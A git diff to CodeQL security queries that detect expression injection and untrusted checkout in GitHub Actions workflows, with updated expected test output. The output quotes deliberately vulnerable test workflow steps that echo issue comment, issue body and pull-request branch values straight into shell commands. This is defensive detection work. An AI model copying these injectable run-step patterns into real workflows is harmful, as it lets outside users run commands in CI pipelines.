b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 590660ce63b1..fd4f03e1edd8 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -44,4 +44,4 @@ where .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getExpression() + sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0d0bb39c41ea..d59cc07cad26 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -38,4 +38,4 @@ from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getRawExpression() + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index db341e0c5ccc..865169b3cd94 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -19,7 +19,10 @@ import actions * An If node that contains an `actor` check */ class ActorCheck extends If { - ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } + ActorCheck() { + this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") + } } /** @@ -32,7 +35,7 @@ class LabelCheck extends If { } } -from Workflow w, Job job, UsesStep checkoutStep +from Workflow w, LocalJob job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ca481768671c..4ef2a2e58755 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,110 +1,21 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -yamlNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | -| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:3:1:3:4 | jobs | -| .github/workflows/test.yml:4:3:4:6 | job1 | -| .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:5:5:11 | runs-on | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | -| .github/workflows/test.yml:8:7:8:16 | job_output | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:9:11:12 | uses | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:15:9:15:12 | name | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | -| .github/workflows/test.yml:16:9:16:10 | id | -| .github/workflows/test.yml:16:13:16:18 | source | -| .github/workflows/test.yml:17:9:17:12 | uses | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | -| .github/workflows/test.yml:19:9:19:12 | name | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | -| .github/workflows/test.yml:20:13:20:16 | step | -| .github/workflows/test.yml:21:9:21:12 | uses | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | -| .github/workflows/test.yml:22:9:22:12 | with | -| .github/workflows/test.yml:23:11:23:16 | source | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:11:25:17 | replace | -| .github/workflows/test.yml:25:20:25:21 | "" | -| .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | -| .github/workflows/test.yml:32:5:32:11 | runs-on | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | -| .github/workflows/test.yml:34:5:34:6 | if | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | -| .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:38:5:38:9 | steps | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -jobNodes +reusableWorkflows +compositeActions +jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -stepNodes +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | @@ -117,17 +28,17 @@ stepNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runExprNodes +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | @@ -142,169 +53,156 @@ runExprNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -allUsesNodes +uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUsesNodes +stepUses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -jobUsesNodes -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesSteps +usesArgs | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | 